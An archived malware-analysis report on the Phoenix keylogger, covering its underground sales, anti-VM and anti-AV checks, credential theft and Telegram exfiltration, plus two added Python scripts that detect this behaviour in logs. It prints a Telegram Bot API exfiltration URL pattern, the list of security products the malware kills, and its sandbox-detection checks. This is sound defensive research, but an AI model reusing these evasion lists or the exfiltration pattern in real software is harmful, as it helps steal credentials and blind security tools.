{
	"id": "10604cd5-7664-4dfb-96c5-1e4d8c608a85",
	"created_at": "2026-04-06T00:17:27.563691Z",
	"updated_at": "2026-04-10T13:12:40.169409Z",
	"deleted_at": null,
	"sha1_hash": "08ea4174d948f00e4bccc4039f48cfae508156ae",
	"title": "Phoenix: The Tale of the Resurrected Keylogger",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4353027,
	"plain_text": "Phoenix: The Tale of the Resurrected Keylogger\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 18:12:38 UTC\r\nResearch by: Assaf Dahan\r\nIntroduction: Keylogger Malware\r\nCybereason’s Nocturnus team is tracking a new keylogger gaining traction among cybercriminals called Phoenix. The keylogger first emerged in July 2019 packed with a myriad of information-stealing features. These features extend well beyond logging keystrokes, to the point where we are inclined to classify it as an infostealer.\r\nThis research explains several aspects of the Phoenix keylogger, including:\r\n1. A Look Into the Underground Community: The ongoing marketing efforts to promote Phoenix in the underground and its reception there.\r\n2. A Technical Breakdown: A technical breakdown of the Phoenix keylogger, including its info-stealing capabilities, communication through Telegram, and potential persistence.\r\n3. The Connection to a Previous Keylogger: The discovery of the Phoenix keylogger’s connection to the “orphaned” Alpha keylogger.\r\nKey Findings\r\nThe Phoenix Keylogger: The Cybereason Nocturnus team is investigating multiple incidents of a new, emerging keylogger called Phoenix, and is now able to provide details on the keylogger’s operations and its creator.\r\nSteals Data From Multiple Sources: Phoenix operates under a malware-as-a-service model and steals personal data from almost 20 different browsers, four different mail clients, FTP clients, and chat clients.\r\nTries to Stop over 80 Security Products: On top of its information-stealing features, Phoenix has several defensive and evasive mechanisms to avoid analysis and detection, including an Anti-AV module that tries to kill the processes of over 80 different security products and analysis tools.\r\nTargets Across Continents: Despite Phoenix having been released in July 2019, it has already targeted victims across North America, the United Kingdom, France, Germany and other parts of Europe and the Middle East. We expect more regions to be affected as it gains popularity.\r\nExfiltrates Data through Telegram: Phoenix offers the common SMTP and FTP exfiltration protocols, but also supports data exfiltration over Telegram. Telegram, a popular chat application worldwide, is leveraged by cybercriminals because its infrastructure is legitimate and its traffic is encrypted in transit. Note that Bot API calls are ordinary HTTPS requests to api.telegram.org, not end-to-end encrypted secret chats, so the request pattern is observable wherever TLS is inspected.\r\nHas the Same Author as the Alpha Keylogger: Phoenix was clearly authored by the same team behind the Alpha keylogger, which disappeared earlier this year.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 1 of 26\r\n“Malware for the People”: This research showcases the ever-growing popularity of the Malware-as-a-Service model in the cybercrime ecosystem. Malware authors are developing malware that is easy for any user to operate and comes bundled with customer support and a competitive price point. As we move into 2020, we expect to see many less-technical cybercriminals leverage MaaS to commit cybercrime, especially as MaaS authors start to compete for the most impressive offering.\r\nBackground: Phoenix Keylogger\r\nAt the end of July 2019, the Cybereason platform detected a malware sample that was classified by some antivirus vendors as Agent Tesla. Upon further review, however, it became clear that this was not Agent Tesla. We were able to determine this malware was a completely new and previously undocumented malware known as the Phoenix keylogger.\r\nPhoenix MaaS Model Pricing\r\nPhoenix updated MaaS model pricing.\r\nIn searching underground communities, we learned that Phoenix first emerged at the end of July 2019. This keylogger follows the malware-as-a-service (MaaS) model and is sold for $14.99-$25.00 per month by a community member with the handle Illusion.\r\nIllusion’s Join Date (24/07/2019)\r\nIllusion joined the underground community at the end of July 2019 and immediately began marketing the keylogger. This behavior is somewhat unusual, as the underground community typically enforces a strict vetting process for members.\r\nReception in the Underground Community\r\nShortly after its launch, the Phoenix keylogger caught the attention of the underground community, with numerous members expressing interest in testing the product. The underground community views Phoenix quite favorably because of its stealing capabilities, stability, easy user interface, and customer support.\r\nExample #1: Extremely User Friendly with Documentation\r\nThis cybercriminal’s review expresses how easy Phoenix is to use. The in-depth review discusses documentation, cost, password recovery, and more - all items that are crucial to maintaining any SaaS.\r\nExample #2: Comes with a User Guide and Friendly Support\r\nThis cybercriminal’s review expresses how Phoenix comes with a user guide and friendly customer support. Specifically, they state how the owner of Phoenix is more than willing to help users if they have questions.\r\nExample #3: 101% Support to Customers\r\nContinued validation of the quality customer support the owner of Phoenix provides.\r\nIllusion’s response to a request for features and recent updates to the changelog.\r\nReviews of the Phoenix keylogger draw a stark contrast with some MaaS products sold in hacker forums. They praise Illusion’s customer support and positive attitude toward the customer, as opposed to others in the underground community who view their customers solely as cash cows.\r\nThese positive reviews suggest Phoenix’s potential for widespread use in the future. Like many modern MaaS offerings, Phoenix gives non-technical and technical users alike easy access to damaging and exploitative software through the proverbial swipe of a credit card. Phoenix is further proof of our ongoing belief that modern MaaS is creating a new group of cybercriminals that profit off of other, less technical cybercriminals.\r\nFurther, Phoenix shows how some cybercriminals are following many of the same methodologies as legitimate software-as-a-service (SaaS) businesses: marketing efforts, relying on positive reviews, responsive customer support, and regularly improving features in their product are hallmarks of a profitable SaaS.\r\nMalware Analysis\r\nMalware Capabilities\r\nThe Phoenix keylogger is written in VB.NET.\r\nPhoenix has a host of features that extend far beyond keylogging, including:\r\nKeylogger + Clipboard Stealer\r\nScreen Capture\r\nPassword Stealing (Browsers, Mail Clients, FTP clients, Chat Clients)\r\nData exfiltration via SMTP, FTP or Telegram\r\nDownloader (to download additional malware)\r\nAlleged AV-Killer Module\r\nAnti-debugging and Anti-VM Features\r\nDelivery Method\r\nBy default, Illusion supplies the Phoenix keylogger to buyers as a stub. The buyer must use their own methods to deliver the stub to the target machine. The majority of Phoenix infections we observe originate from phishing attempts that leverage a weaponized rich text file (RTF) or Microsoft Office document. These deliveries do not use the more popular malicious macro technique, but instead use known exploits. Most commonly, they exploit the Equation Editor vulnerability (CVE-2017-11882).\r\nProcess tree of the Phoenix infection using a weaponized document.\r\nInfected System Profiling\r\nOnce Phoenix successfully infects the target machine, it profiles the machine to gather information on the operating system, hardware, running processes, users, and its external IP. Phoenix stores the information in memory and sends it back to the attackers directly, without writing it to disk. Attackers commonly do this to be stealthier, since it is harder to know what was exfiltrated if it is never written to disk.\r\nExample of system profiling data sent to the attackers.\r\nAnti-Analysis \u0026 Anti-Detection Features\r\nIt’s clear Illusion invested time and effort into protecting Phoenix, as the stub uses a few different methods to protect itself from inspection.\r\nString Encryption: Most critical strings used by the malware are encrypted and only decrypted in memory.\r\nObfuscation: The stub is obfuscated by what appears to be an implementation of the open source ConfuserEx .NET obfuscator to hinder correct decompilation and code inspection.\r\nIllusion recommends using an additional third-party crypter to “make it FUD”, or fully undetectable. It is worth noting that most Phoenix samples caught in the wild are packed with a crypter, but are still detected by the majority of antivirus vendors.\r\nAfter obtaining basic system information, Phoenix checks to see if it is running in a “hostile” environment. A hostile environment can take different forms: Phoenix deployed in a virtual machine, under a debugger, or on a machine with analysis tools or antivirus products installed. 
Phoenix has a set of features, configured from the admin panel, to disable different Windows tools on the victim machine, like disabling CMD, the registry editor, task manager, system restore, and others.\r\nIt is interesting to note that even though the user interface used by Phoenix’s operators seems to have support for a persistence feature, most samples analyzed by Cybereason did not exhibit persistence behavior following a successful infection. A possible explanation for this lies in the attackers’ wish to minimize the risk of overexposure. Once Phoenix has obtained the necessary data, there is no need for it to increase the risk of exposure by persisting longer than needed.\r\nThe Phoenix keylogger admin panel, with features to disable different tools.\r\nLet’s dive into some of the techniques Phoenix uses to detect a “hostile” environment.\r\nAnti-VM Module\r\nMost of Phoenix’s anti-VM checks are based on known techniques. Given the checks used and their order, we believe they were most likely copy-pasted from the Cyberbit blog. Phoenix performs the checks and terminates itself if it discovers any of the following processes or files on the target machine. The list is reproduced exactly as embedded in the stub, including its spelling.\r\nPhoenix checking for various running processes.\r\nChecking for running processes:\r\nSandboxieRpcSs\r\nVmtoolsd\r\nVmwaretrat\r\nVmwareuser\r\nVmacthlp\r\nVboxservice\r\nVboxtray\r\nChecking for the existence of the following files:\r\nc:\\windows\\System32\\Drivers\\VBoxMouse.sys\r\nc:\\windows\\System32\\Drivers\\vm3dgl.dll\r\nc:\\windows\\System32\\Drivers\\vmtray.dll\r\nc:\\windows\\System32\\Drivers\\VMToolshook.dll\r\nc:\\windows\\System32\\Drivers\\vmmousever.dll\r\nc:\\windows\\System32\\Drivers\\VBoxGuest.sys\r\nc:\\windows\\System32\\Drivers\\VBoxSF.sys\r\nc:\\windows\\System32\\Drivers\\VBoxVideo.sys\r\nc:\\windows\\System32\\VBoxService.exe\r\nDisabling Windows Defender\r\nPhoenix attempts to disable the Windows Defender AntiSpyware module by changing the registry value shown in the screenshot below. On current Windows builds this change is blocked by Tamper Protection where it is enabled, and a successful change is itself a high-fidelity detection opportunity, since legitimate software rarely touches this value.\r\nPhoenix attempts to disable Windows Defender Antispyware.\r\nAnti-AV Module\r\nPhoenix’s anti-AV module tries to terminate the processes of a vast number of security products and analysis tools. The list is embedded as-is in the stub: it mixes legacy 1990s-era product names with current ones, contains duplicates, and includes analysis tools such as Wireshark, Snort and olydbg (presumably OllyDbg) alongside antivirus products.\r\nPhoenix terminating the process of different security products.\r\nSecurity Products Phoenix Attempts to Terminate:\r\nzlclient, egui, bdagent, npfmsg, olydbg, anubis, wireshark, avastui, _Avp32, vsmon, mbam, keyscrambler, _Avpcc, _Avpm, Ackwin32, Outpost, Anti-Trojan, ANTIVIR, Apvxdwin, ATRACK, Autodown, Avconsol, Ave32, Avgctrl, Avkserv, Avnt, Avp, Avp32, Avpcc, Avpdos32, Avpm, Avptc32, Avpupd, Avsched32, AVSYNMGR, Avwin95, Avwupd32, Blackd, Blackice, Cfiadmin, Cfiaudit, Cfinet, Cfinet32, Claw95, Claw95cf, Cleaner, Cleaner3, Defwatch, Dvp95, Dvp95_0, Ecengine, Esafe, Espwatch, F-Agnt95, Findviru, Fprot, F-Prot, F-Prot95, Fp-Win, Frw, F-Stopw, Iamapp, Iamserv, Ibmasn, Ibmavsp, Icload95, Icloadnt, Icmon, Icsupp95, Icsuppnt, Iface, Iomon98, Jedi, Lockdown2000, Lookout, Luall, MCAFEE, Moolive, Mpftray, N32scanw, NAVAPSVC, NAVAPW32, NAVLU32, Navnt, NAVRUNR, Navw32, Navwnt, NeoWatch, NISSERV, Nisum, Nmain, Normist, NORTON, Nupgrade, Nvc95, Outpost, Padmin, Pavcl, Pavsched, Pavw, PCCIOMON, PCCMAIN, Pccwin98, Pcfwallicon, Persfw, POP3TRAP, PVIEW95, Rav7, Rav7win, Rescue, Safeweb, Scan32, Scan95, Scanpm, Scrscan, Serv95, Smc, SMCSERVICE, Snort, Sphinx, Sweep95, SYMPROXYSVC, Tbscan, Tca, Tds2-98, Tds2-Nt, TermiNET, Vet95, Vettray, Vscan40, Vsecomr, Vshwin32, Vsstat, Webscanx, WEBTRAP, Wfindv32, Zonealarm, LOCKDOWN2000, RESCUE32, LUCOMSERVER, avgcc, avgcc, avgamsvr, avgupsvc, avgw, avgcc32, avgserv, avgserv9, avgserv9schedapp, avgemc, ashwebsv, ashdisp, ashmaisv, ashserv, aswUpdSv, symwsc, norton, Norton Auto-Protect, norton_av, nortonav, ccsetmgr, ccevtmgr, avadmin, avcenter, avgnt, avguard, avnotify, avscan, guardgui, nod32krn, nod32kui, clamscan, clamTray, clamWin, freshclam, oladdin, sigtool, w9xpopen, Wclose, cmgrdian, alogserv, mcshield, vshwin32, avconsol, vsstat, avsynmgr, avcmd, avconfig, licmgr, sched, preupd, MsMpEng, MSASCui, Avira.Systray\r\nPhoenix’s Core Stealing Functionality\r\nOnce Phoenix finishes checking for a hostile environment, it executes several different stealing modules.\r\nCredential Stealing\r\nPhoenix attempts to steal credentials and other sensitive information stored locally on the target machine by searching for specific files or registry keys that contain sensitive information. 
It searches browsers, mail clients, FTP clients, and chat clients.\r\nBrowsers\r\nChrome, Firefox, Opera, Vivaldi, Brave, Blisk, Epic, Avast browser, SRware Iron, Comodo, Torch, Slimjet, UC browser, Orbitum, Coc Coc, QQ Browser, 360 Browser, Liebao\r\nMail Clients\r\nOutlook, Thunderbird, Seamonkey, Foxmail\r\nFTP Client\r\nFilezilla\r\nChat Clients\r\nPidgin\r\nExcerpt from Phoenix’s Outlook module\r\nExcerpt from Phoenix’s Pidgin module\r\nKeylogger Module\r\nPhoenix uses a common method of hooking keyboard events for its keylogging: it installs a keyboard hook through the Windows API function SetWindowsHookExA, records each pressed key, and attributes the keystroke to the process that owned the foreground window at the time, so the stolen log shows which application each string was typed into.\r\nExcerpt from Phoenix’s keylogger hooking function.\r\nPhoenix keylogger functionality matching keystrokes to the relevant process.\r\nNetwork \u0026 C2 Communication\r\nPhoenix checks for Internet connectivity and obtains the external IP address of the target machine by sending an HTTP GET request to ifconfig.me, a well-known public service. The response gives Phoenix the external IP address of the target machine; if there is no Internet connectivity, Phoenix terminates itself. A request to an external-IP lookup service from a process that is not a browser is a cheap hunting lead in proxy logs, especially when the same process then posts to an exfiltration endpoint.\r\nPhoenix determines the external IP of an infected machine using a legitimate web service\r\nPhoenix applies no encryption of its own to the stolen data before posting it over SMTP, FTP, or Telegram.\r\nSMTP Communication \u0026 Exfiltration\r\nIn the majority of cases, Phoenix posts the stolen data using the SMTP protocol. The stolen data is sent as an email to an email address controlled by the attacker.\r\nStolen browser data exfiltrated as an email message\r\nTelegram Communication \u0026 Exfiltration\r\nAlternatively, in some cases Phoenix exfiltrates data by abusing the API of the popular Telegram chat application. This method of exfiltration is quite stealthy, since it abuses Telegram’s legitimate infrastructure. Other malware has also started to use this technique, including the Masad Stealer.\r\nPhoenix sends an HTTP GET request to Telegram’s Bot API. The URL path carries the bot ID and API token, and the query string carries the chat ID and the stolen data, URL-encoded, in the text parameter. Because the token and chat ID are compiled into the stub, they are stable for a given operator and serve as indicators in their own right.\r\nHTTP request sent to Telegram’s API extracted from memory.\r\nhttps://api[.]telegram[.]org/bot[ID]:[API_Token]/sendMessage?chat_id=[ID]\u0026text=[URL_ENCODED_TEXT]\r\nTelegram HTTP request pattern used by Phoenix\r\nURL decoded text posted to a Telegram bot.\r\nThe Telegram bot responds with the following details (the captured response is truncated):\r\n{\"ok\":true,\"result\":{\"message_id\":[redacted],\"from\":{\"id\":[redacted],\"is_bot\":true,\"first_name\":\"[red\r\nThe stolen data is passed through Telegram, allowing the operator to leverage a legitimate application for malicious communication and exfiltration.\r\nAdditional Communication with the C2 Server\r\nAt its current stage of development, Phoenix does not seem to use a standard, interactive C2 model. Specifically, it doesn’t expect to receive commands back from the C2 server. Phoenix’s various tasks, like infostealing, downloading additional malware, and spreading via USB, are predefined by the operators in the configuration file before compilation. 
Phoenix uses the exfiltration method predefined in the configuration file to send whatever data it collected on execution.\r\nConnecting to Alpha Keylogger\r\nDuring our investigation, we discovered the Phoenix keylogger is actually an evolution of an earlier project, the Alpha keylogger. We believe the Alpha keylogger was authored by the same team behind the Phoenix keylogger.\r\nCode Similarity Between Alpha and Phoenix Keylogger\r\nIn order to investigate deeper, we used YARA rules and other methods to retrieve additional samples of Phoenix. One of the samples we retrieved was almost identical to Phoenix, with some parts copy-pasted with the same naming conventions, parameter names, and more. However, the name of the malware as it appeared in logs and in code was consistently Alpha keylogger.\r\nSimilarities Between INFO Schemes\r\nAlpha Keylogger Client INFO Scheme\r\nPhoenix Keylogger Client INFO Scheme\r\nSimilarities Between SMTP Configurations\r\nPhoenix Keylogger SMTP Configuration\r\nAlpha Keylogger SMTP Configuration\r\nSimilarities Between SMTP Functions\r\nPhoenix Keylogger SMTP Function\r\nAlpha Keylogger SMTP Function\r\nSimilarities Between Self-Termination Functions\r\nPhoenix Keylogger Self-termination Function\r\nAlpha Keylogger Self-termination Function\r\nAlpha Keylogger Overview\r\nIn searching the underground communities, we found references to the Alpha keylogger beginning as early as April 2019. At that time, member Alpha_Coder and later, member AK_Generation, began marketing the keylogger to the underground community.\r\nAlpha keylogger launched in April 2019 by Alpha_Coder.\r\nIn reviewing Alpha_Coder’s marketing materials, it is clear the two keyloggers are linked. They share the exact same features, and the description of the features uses the exact same phrasing and even the same font.\r\nPhoenix Keylogger Marketing\r\nAlpha Keylogger Marketing\r\nIn addition, the design of the admin panel for the Alpha keylogger is very similar to the design of the admin panel for the Phoenix keylogger.\r\nAlpha Keylogger Admin Panel\r\nPhoenix Keylogger Admin Panel\r\nDisappearance of Alpha, Emergence of Phoenix\r\nAt the beginning of July 2019, the two members responsible for marketing the Alpha keylogger went completely silent. This happened just before the emergence of the Phoenix keylogger at the end of July 2019.\r\nThe last message by Alpha_Coder from the beginning of July 2019.\r\nA potential buyer wonders whether the Alpha keylogger is still available.\r\nWhile it is not completely clear why the Alpha keylogger was abruptly shut down, chatter in the selling thread gives away potential clues. Alpha_Coder was banned from posting in the forum for one month, for reasons unknown. During that time, AK_Generation led marketing efforts for the Alpha keylogger.\r\nAK_Generation marketing the Alpha keylogger.\r\nAK_Generation was created on April 27, 2019, the same day the Alpha keylogger was first promoted by Alpha_Coder. Interestingly, AK_Generation also disappeared close to the launch date of the Phoenix keylogger. It is likely that Alpha_Coder and AK_Generation are operated by the same person, and that AK_Generation was created as a backup account for Alpha_Coder.\r\nThe last time AK_Generation was seen on the underground community.\r\nWe believe the Phoenix keylogger is not just an evolution of the Alpha keylogger, but also an attempt to rebrand and give the author a clean slate in the underground community.\r\nConclusion\r\nThis research breaks down the Phoenix keylogger, an information stealer operating under a malware-as-a-service model, currently under active development. Since its emergence in late July 2019, it has gained popularity in the underground community because of its ease of use, competitive pricing, and personal customer support.\r\nPhoenix is more than just a keylogger, with broad information-stealing capabilities, self-defense mechanisms, which include an anti-AV module that attempts to stop over 80 security products, and the ability to exfiltrate data through Telegram. The majority of samples we identified in the wild do not implement a persistence mechanism, nor do they interact bidirectionally with the C2 server. 
Instead, the stolen data is posted to a pre-configured exfiltration method, which suggests Phoenix is being used mostly as a “set it and forget it” type of malware.\r\nBased on our analysis, Phoenix’s malware-as-a-service model appeals to a broad range of cybercriminals, particularly the less sophisticated who do not possess the technical know-how to develop their own successful malware infrastructure. This signals a continued trend of cybercriminals following the malware-as-a-service model to make malware accessible to users of any skill level. Malware authors are starting to use many of the same methodologies as legitimate software-as-a-service businesses, including marketing their software, personalized customer support, and an easy user interface, to continuously profit off of other, less technical cybercriminals.\r\nMoving into 2020, we expect a proliferation of less-technical cybercriminals to leverage MaaS to target, steal from, and harm individuals, particularly as MaaS authors add additional features to their offerings.\r\nINDICATORS OF COMPROMISE\r\nFind the indicators of compromise for this attack in the original post. 
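The network behaviour described in the Network & C2 Communication section, an external-IP lookup against ifconfig.me followed by a Telegram Bot API call whose URL carries the bot token, chat ID and the URL-encoded stolen text, is straightforward to hunt for in proxy logs. The following Python is an added example and is not code from the report or from Cybereason: the log lines are constructed, the bot ID, token and chat ID are placeholders, and the two IP-lookup hosts beyond ifconfig.me are assumptions. It parses the Bot API URL, redacts the token, decodes the text parameter, and then correlates both indicators per process, which is the order in which Phoenix performs them.

```python
from urllib.parse import parse_qs, urlsplit
import re

# Constructed proxy log excerpt (not from the report): process, method, URL.
# The bot id, token and chat id below are placeholders, not real indicators.
SAMPLE_LOG = '''
svchost.exe GET https://www.microsoft.com/en-us/
updater.exe GET https://ifconfig.me/
updater.exe GET https://api.telegram.org/bot123456789:AAHexampleTokenValueXYZ/sendMessage?chat_id=987654321&text=Phoenix+Keylogger%0APC+Name%3A+WIN-TEST%0AUser%3A+alice
chrome.exe GET https://api.telegram.org/
chrome.exe GET https://ifconfig.me/
'''.strip()

# ifconfig.me is the service named in the report; the other two are assumed
# additions that answer the same question (what is my external IP).
IP_LOOKUP_HOSTS = {'ifconfig.me', 'api.ipify.org', 'icanhazip.com'}

# Bot API path shape: /bot<numeric id>:<token>/<method>
BOT_PATH = re.compile(r'^/bot([0-9]+):([A-Za-z0-9_-]+)/([A-Za-z]+)$')


def redact_token(token):
    # Keep a short prefix to pivot on; never copy the full secret into a ticket.
    return token[:4] + '***'


def parse_telegram_bot_url(url):
    # Returns bot id, redacted token, method, chat id and the decoded text for
    # a Bot API call, or None for anything else (ordinary web use included).
    parts = urlsplit(url)
    if parts.hostname != 'api.telegram.org':
        return None
    match = BOT_PATH.match(parts.path)
    if not match:
        return None
    bot_id, token, method = match.groups()
    query = parse_qs(parts.query)  # undoes both percent- and plus-encoding
    return {
        'bot_id': bot_id,
        'token': redact_token(token),
        'method': method,
        'chat_id': query.get('chat_id', [''])[0],
        'text': query.get('text', [''])[0],
    }


def scan_proxy_log(log_text):
    # One finding per suspicious request: (process, indicator, detail).
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        process, _method, url = fields
        host = urlsplit(url).hostname or ''
        if host in IP_LOOKUP_HOSTS:
            findings.append((process, 'external_ip_lookup', host))
        info = parse_telegram_bot_url(url)
        if info is not None:
            findings.append((process, 'telegram_bot_api', info))
    return findings


def processes_with_exfil_sequence(findings):
    # Phoenix first learns its external IP and then posts to the Bot API.
    # One process doing both is a far stronger signal than either alone,
    # because browsers legitimately visit ifconfig.me and Telegram every day.
    seen = {}
    for process, indicator, _detail in findings:
        seen.setdefault(process, set()).add(indicator)
    wanted = {'external_ip_lookup', 'telegram_bot_api'}
    return sorted(p for p, indicators in seen.items() if wanted <= indicators)


if __name__ == '__main__':
    results = scan_proxy_log(SAMPLE_LOG)
    for process, indicator, detail in results:
        print(process, indicator, detail)
    print('exfil sequence seen from:', processes_with_exfil_sequence(results))
```

The per-process correlation is the point: either indicator alone is noisy, while a non-browser process that does both within one session is close to a signature of this exfiltration path. The decoded text parameter is exactly what the operator received, so it doubles as scoping evidence for what was taken from that host.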
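The Anti-AV module described in the Malware Analysis section opens each listed process with terminate rights, which Sysmon records as Event ID 10 (ProcessAccess) with a GrantedAccess mask that includes 0x1 (PROCESS_TERMINATE). The following Python is an added example, not code from the report or from Cybereason; the events are constructed and the kill list is a subset of the names listed above. It flags any source process that asks for terminate access on several kill-list processes within a short window, which is what a one-shot kill loop looks like and what a user closing a single program does not.

```python
from collections import defaultdict
from datetime import datetime

# Subset of the process names from the kill list in the report, lower-cased
# and without the .exe suffix; extend it from the full list above.
KILL_LIST = {
    'zlclient', 'egui', 'bdagent', 'avastui', 'vsmon', 'mbam', 'keyscrambler',
    'wireshark', 'olydbg', 'msmpeng', 'msascui', 'avgnt', 'avguard', 'avcenter',
    'nod32krn', 'nod32kui', 'ccsetmgr', 'ccevtmgr', 'mcshield', 'avira.systray',
}

PROCESS_TERMINATE = 0x0001  # access-mask bit a Process.Kill() style call needs

# Constructed Sysmon Event ID 10 (ProcessAccess) style records, not from the
# report: (UtcTime, SourceImage, TargetImage, GrantedAccess). Images are
# shortened to file names; real events carry full paths.
SAMPLE_EVENTS = [
    ('2019-07-30 10:00:01', 'update.exe', 'MsMpEng.exe', 0x0001),
    ('2019-07-30 10:00:01', 'update.exe', 'MSASCui.exe', 0x0001),
    ('2019-07-30 10:00:02', 'update.exe', 'avgnt.exe', 0x0001),
    ('2019-07-30 10:00:02', 'update.exe', 'avguard.exe', 0x0001),
    ('2019-07-30 10:00:02', 'update.exe', 'wireshark.exe', 0x0001),
    ('2019-07-30 10:00:05', 'update.exe', 'explorer.exe', 0x1000),
    ('2019-07-30 10:03:00', 'taskmgr.exe', 'MsMpEng.exe', 0x0001),
    ('2019-07-30 10:07:30', 'taskmgr.exe', 'chrome.exe', 0x0001),
    ('2019-07-30 10:09:00', 'MsMpEng.exe', 'avgnt.exe', 0x1400),
]


def is_on_kill_list(image):
    # Compare on the bare, lower-cased file name so path, case and the .exe
    # suffix do not matter (chr(92) is the Windows path separator).
    name = image.replace(chr(92), '/').rsplit('/', 1)[-1].lower()
    if name.endswith('.exe'):
        name = name[:-4]
    return name in KILL_LIST


def parse_time(text):
    return datetime.strptime(text, '%Y-%m-%d %H:%M:%S')


def terminate_bursts(events, window_seconds=60, threshold=3):
    # Flags every source process that requested PROCESS_TERMINATE on at least
    # threshold distinct kill-list processes within window_seconds. Returns a
    # list of (source_image, window_start_iso, sorted_target_names).
    by_source = defaultdict(list)
    for utc, source, target, access in events:
        if access & PROCESS_TERMINATE and is_on_kill_list(target):
            by_source[source].append((parse_time(utc), target))
    alerts = []
    for source, hits in by_source.items():
        hits.sort()
        for i, (start, _target) in enumerate(hits):
            in_window = {t for ts, t in hits[i:]
                         if (ts - start).total_seconds() <= window_seconds}
            if len(in_window) >= threshold:
                alerts.append((source, start.isoformat(), sorted(in_window)))
                break  # one alert per source is enough
    return alerts


if __name__ == '__main__':
    for source, when, targets in terminate_bursts(SAMPLE_EVENTS):
        print(source, 'requested terminate on', len(targets),
              'security tools at', when, targets)
```

Tuning note: the threshold and window are the knobs. A single terminate request against one security process is what a user closing a tray utility looks like; three or more distinct kill-list targets inside a minute from one image, especially an image living under a user-writable directory, is the loop above and little else.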
\r\nMITRE ATT\u0026CK TECHNIQUES BREAKDOWN\r\nInitial Access: Spear Phishing Attachment\r\nExecution: Execution through API; Command-Line Interface\r\nDefense Evasion: Software Packing; Deobfuscate/Decode Files or Information; Obfuscated Files or Information\r\nCredential Access: Credentials from Web Browsers; Credentials in Files; Input Capture\r\nDiscovery: System Time Discovery; Account Discovery; File and Directory Discovery; System Information Discovery; Query Registry; Process Discovery; System Owner/User Discovery; System Network Configuration Discovery\r\nCollection: Data from Local System; Screen Capture\r\nCommand and Control: Remote File Copy; Web Service\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nSource: https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger"
	],
	"report_names": [
		"phoenix-the-tale-of-the-resurrected-alpha-keylogger"
	],
	"threat_actors": [],
	"ts_created_at": 1775434647,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/08ea4174d948f00e4bccc4039f48cfae508156ae.pdf",
		"text": "https://archive.orkl.eu/08ea4174d948f00e4bccc4039f48cfae508156ae.txt",
		"img": "https://archive.orkl.eu/08ea4174d948f00e4bccc4039f48cfae508156ae.jpg"
	}
}